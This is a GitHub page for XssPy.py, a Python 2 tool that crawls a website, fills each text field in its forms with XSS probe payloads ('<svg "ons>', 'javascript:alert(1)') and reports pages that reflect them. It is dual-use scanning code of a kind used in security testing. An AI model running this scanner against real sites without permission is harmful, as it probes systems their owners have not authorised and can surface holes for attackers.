forked from faizann24/XssPy
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathXssPy.py
186 lines (166 loc) · 5.44 KB
/
XssPy.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
import mechanize
import sys
br = mechanize.Browser() #initiating the browser
br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11')]
br.set_handle_robots(False)
br.set_handle_refresh(False)
class color:
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
print color.BOLD + color.RED + """
XssPy - Finding XSS made easier
Author: Faizan Ahmad (Fsecurify)
Email: [email protected]
Usage: pythonXssPy.py website.com (Do not write www.website.com OR http://www.website.com)
Comprehensive Scan: python XssPy.py website.com -e
Description: XssPy is a python tool for finding Cross Site Scripting
vulnerabilities in websites. This tool is the first of its kind.
Instead of just checking one page as most of the tools do, this tool
traverses the website and find all the links and subdomains first.
After that, it starts scanning each and every input on each and every
page that it found while its traversal. It uses small yet effective
payloads to search for XSS vulnerabilities. XSS in many high
profile websites and educational institutes has been found
by using this very tool.
""" + color.END
def initializeAndFind(firstDomains):
dummy = 0 #dummy variable for doing nothing
firstDomains = [] #list of domains
if len(sys.argv) >=2: #if the url has been passed or not
url = sys.argv[1]
else:
print "Url not provided correctly"
return 0
smallurl = sys.argv[1] #small url is the part of url without http and www
allURLS = []
allURLS.append(url) #just one url at the moment
largeNumberOfUrls = [] #in case one wants to do comprehensive search
noSecondParameter = 0
if len(sys.argv) < 3:
noSecondParameter = 0
else:
noSecondParameter = 1
if sys.argv[1]:
print "Doing a short traversal." #doing a short traversal if no command line argument is being passed
for url in allURLS:
x = str(url)
smallurl = x
url = "http://www." + str(url)
try:
br.open(url)
print "Finding all the links of the website " + str(url)
try:
for link in br.links(): #finding the links of the website
if smallurl in str(link.absolute_url):
firstDomains.append(str(link.absolute_url))
firstDomains = list(set(firstDomains))
except:
dummy = 0
except:
dummy = 0
print "Number of links to test are: " + str(len(firstDomains))
if noSecondParameter != 0:
if(sys.argv[2] == "-e"): #if we want to do comprehensive traversal, we pass -e as command line argument
print "Doing a comprehensive traversal. This could take a while."
for link in firstDomains:
try:
br.open(link)
try:
for newlink in br.links(): #going deeper into each link and finding its links
if smallurl in str(newlink.absolute_url):
largeNumberOfUrls.append(newlink.absolute_url)
except:
dummy = 0
except:
dummy = 0
firstDomains = list(set(firstDomains + largeNumberOfUrls))
print "Total Number of links to test have become: " + str(len(firstDomains)) #all links have been found
return firstDomains
def findxss(firstDomains):
print "Started finding XSS" #starting finding XSS
xssLinks = [] #TOTAL CROSS SITE SCRIPTING FINDINGS
count = 0 #to check for forms
dummyVar = 0 #dummy variable for doing nothing
if len(firstDomains) > 0: #if there is atleast one link
for link in firstDomains:
y = str(link)
print str(link)
if 'jpg' in y: #just a small check
print "Not a good url to test"
elif 'pdf' in y:
print "Not a good url to test"
else:
try:
br.open(str(link)) #open the link
except:
dummyVar = 0
try:
for form in br.forms(): #check its forms
count = count + 1
except:
dummyVar = 0
if count > 0: #if a form exists, submit it
try:
params = list(br.forms())[0] #our form
except:
dummyVar = 0
try:
br.select_form(nr=0) #submit the first form
except:
dummyVar = 0
for p in params.controls:
par = str(p)
if 'TextControl' in par: #submit only those forms which require text
print str(p.name)
try:
br.form[str(p.name)] = '<svg "ons>' #our payload
except:
dummyVar = 0
try:
br.submit()
except:
dummyVar = 0
try:
if '<svg "ons>' in br.response().read(): #if payload is found in response, we have XSS
print "\n\nXss found and the link is" + str(link) + " And the payload is <svg \"ons>" + "\n\n"
xssLinks.append(link)
else:
dummyVar = 0
except:
print "could not read the page"
try:
br.back()
except:
dummyVar = 0
#SECOND PAYLOAD
try:
br.form[str(p.name)] = 'javascript:alert(1)' #second payload
except:
dummyVar = 0
try:
br.submit()
except:
dummyVar = 0
try:
if '<a href="javascript:alert(1)' in br.response().read():
print "\n\nXss found and the link is" + str(link) + " And the payload is javascript:alert(1)" + "\n\n"
xssLinks.append(link)
else:
dummyVar = 0
except:
print "Could not read a page"
try:
br.back() #go back to the previous page
except:
dummyVar = 0
count = 0
for link in xssLinks: #print all xss findings
print link
else:
print "No link found, exiting"
#calling the function
firstDomains = []
firstDomains = initializeAndFind(firstDomains)
findxss(firstDomains)